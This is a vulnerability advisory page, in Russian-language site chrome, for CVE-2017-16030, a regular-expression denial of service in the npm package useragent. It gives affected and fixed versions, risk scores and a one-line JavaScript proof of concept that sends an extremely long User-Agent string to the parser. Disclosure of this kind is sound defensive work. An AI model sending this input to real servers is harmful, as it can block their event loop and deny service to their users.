Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-pjmx-9xr3-82qr

Опубликовано: 24 июл. 2018
Источник: github
Github: Прошло ревью

Описание

ReDoS via long UserAgent header in useragent

Affected versions of useragent are vulnerable to regular expression denial of service when an arbitrarily long User-Agent header is parsed.

Proof of Concept

var useragent = require('useragent'); var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP'; var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n'; console.log(useragent.parse(request));

Recommendation

Update to version 2.1.13 or later.

Ссылки

Пакеты

Наименование

useragent

npm
Затронутые версииВерсия исправления

<= 2.1.12

2.1.13

EPSS

Процентиль: 62%
0.00433
Низкий

CVE ID

CVE-2017-16030

Дефекты

CWE-400

Связанные уязвимости

redhat логотип

CVE-2017-16030

CVSS3: 7.5
redhat
почти 9 лет назад

Useragent is used to parse useragent headers. It uses several regular expressions to accomplish this. An attacker could edit their own headers, creating an arbitrarily long useragent string, causing the event loop and server to block. This affects Useragent 2.1.12 and earlier.

nvd логотип

CVE-2017-16030

CVSS3: 7.5
nvd
больше 7 лет назад

Useragent is used to parse useragent headers. It uses several regular expressions to accomplish this. An attacker could edit their own headers, creating an arbitrarily long useragent string, causing the event loop and server to block. This affects Useragent 2.1.12 and earlier.

EPSS

Процентиль: 62%
0.00433
Низкий

CVE ID

CVE-2017-16030

Дефекты

CWE-400